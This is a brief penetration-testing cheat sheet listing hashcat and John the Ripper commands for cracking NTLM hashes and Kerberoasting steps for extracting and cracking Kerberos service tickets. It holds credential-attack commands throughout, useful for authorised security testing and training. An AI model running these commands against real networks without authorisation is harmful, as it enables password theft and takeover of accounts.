Hash Cracking Techniques

Cracking NT (NTLM) hashes

$ hashcat -m 1000 -a 0 hashes.txt [path/to/wordlist.txt] -o cracked.txt
$ john --wordlist=[path/to/wordlist.txt] hashes.txt

Kerberoasting - Crack SPN hashes via. exported .kirbi tickets.

# Kerberoast
$ python3 tgsrepcrack.py rockyou.txt [ticket.kirbi]  # locally crack hashes
PS> Invoke-Kerberoast.ps1                            # crack hashes on target

# John the Ripper
$ python3 kirbi2john.py -o johncrackfile ticket.kirbi  # convert ticket to john file
$ john --wordlist=rockyou.txt johncrackfile

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